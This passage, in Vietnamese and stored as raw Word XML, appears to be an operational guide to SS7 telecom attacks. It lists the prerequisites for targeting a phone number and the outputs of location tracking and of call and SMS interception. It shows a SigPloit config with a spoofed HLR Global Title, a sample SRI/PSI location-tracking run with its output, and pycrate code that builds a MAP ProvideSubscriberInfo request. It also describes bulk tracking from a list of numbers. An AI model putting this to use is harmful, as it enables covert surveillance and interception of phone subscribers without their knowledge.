              <w:t xml:space="preserve">Lấy từ nhà mạng cung cấp access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">MSISDN mục tiêu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Số điện thoại</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Thông tin công khai hoặc thu thập trước</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">IMSI mục tiêu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">15 chữ số duy nhất định danh SIM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Từ SRI response hoặc IMSI catcher</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Phần mềm MAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Tool tạo và gửi MAP PDU</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SigPloit, SS7MAPer, tự viết</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">SCTP/M3UA stack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lớp vận chuyển SS7 over IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Linux kernel SCTP module</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkStart w:id="23" w:name="đầu-ra-output-chi-tiết"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.6 Đầu Ra (Output) Chi Tiết</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Location tracking output:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ├── Cell-ID (28-bit: MCC+MNC+LAC+CellID)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ├── Toạ độ GPS (sau khi tra OpenCelliD)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ├── Tên tòa nhà / khu vực (reverse geocoding)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  └── Lịch sử di chuyển (nếu polling liên tục)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Call interception output:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ├── PCM audio stream (G.711 μ-law, 64 kbps)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ├── Timestamp cuộc gọi (start/end)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  └── CLI/CLIR (số gọi đến/từ)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SMS interception output:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ├── Nội dung SMS (UTF-8 / GSM 7-bit)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  ├── Sender/Receiver MSISDN</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  └── Timestamp</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkStart w:id="28" w:name="công-cụ-chi-tiết"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.7 Công Cụ Chi Tiết</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="24" w:name="sigploit"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.7.1 SigPloit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Repository: github.com/SigPloiter/SigPloit</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Ngôn ngữ: Python 3</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Phụ thuộc: pycrate, pyshark, scapy</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Cấu trúc dự án:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">SigPloit/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── sigploit.py              # Entry point, menu tương tác</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── configs/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   └── ss7.cfg              # Cấu hình kết nối STP</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">├── telecom/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── ss7/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   ├── map_attacks.py   # 15+ MAP attack implementations</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   ├── SRI.py           # Send Routing Information</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   ├── PSI.py           # Provide Subscriber Information</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   ├── ATI.py           # Any Time Interrogation</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   ├── ISD.py           # Insert Subscriber Data</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   ├── RegisterSS.py    # Register Supplementary Service</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   └── ForwardSM.py     # Forward Short Message</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   ├── diameter/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   │   └── diameter_attacks.py</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│   └── gsm/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">│       └── gsm_attacks.py</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">└── libs/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    └── pycrate/             # ASN.1 encode/decode library</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Cấu hình kết nối SS7 (ss7.cfg):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">[SS7]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Địa chỉ STP kết nối</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">STP_IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 10.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">STP_PORT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">2905</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Global Title của attacker (giả mạo là HLR)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">OPC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1-1-1          # Originating Point Code</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DPC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2-2-2          # Destination Point Code</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">GT_attacker </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> +49XXXXXXXXXX   # GT giả mạo HLR Đức</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># SCTP parameters</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">SCTP_PPID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3        # M3UA PPID</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Chạy tấn công location tracking:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">python3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> sigploit.py</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Menu:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># [1] SS7 Attacks</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#   [1] Location Tracking</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#     [1] SRI Attack</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#       Enter MSISDN: +84901234567</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#       [*] Sending SRI...</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#       [+] IMSI: 452040123456789</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#       [+] MSC Address: +84282000001</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#     [2] PSI Attack</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#       Enter IMSI: 452040123456789</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#       [+] Cell-ID: 452-04-3421-12345</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">#       [+] Location: 10.7756°N, 106.6979°E (Quận 1, TP.HCM)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Ví dụ code tạo MAP PSI request thủ công (pycrate):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">from</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> pycrate_mobile.TS29002_MAP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pycrate_asn1rt.utils </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">*</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Tạo MAP ProvideSubscriberInfo argument</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">psi_arg </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> MAP_MS_DataTypes.ProvideSubscriberInfo_Arg()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">psi_arg[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'imsi'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">][</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'value'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">].set_val(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">bytes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.fromhex(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'24040112345678F9'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># IMSI BCD</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">psi_arg[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'requestedInfo'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">][</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'locationInformation'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">].set_val(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">None</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">psi_arg[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'requestedInfo'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">][</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'subscriberState'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">].set_val(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">None</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Encode thành BER</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">psi_bytes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> psi_arg.to_ber()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Bọc trong TCAP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="RegionMarkerTok"/>
        </w:rPr>
        <w:t xml:space="preserve">BEGIN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> + SCCP/MTP3/SCTP và gửi</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># (phần transport tùy thuộc vào stack SS7 sử dụng)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="25" w:name="ss7maper"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.7.2 SS7MAPer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Nguồn: Tobias Engel, CCC 2014</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Ngôn ngữ: Python</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Chức năng nổi bật:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  - Bulk location tracking từ file CSV chứa danh sách MSISDN</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  - Export kết quả sang KML (Google Earth) để visualize di chuyển</w:t>
      </w:r>
      <w:r>
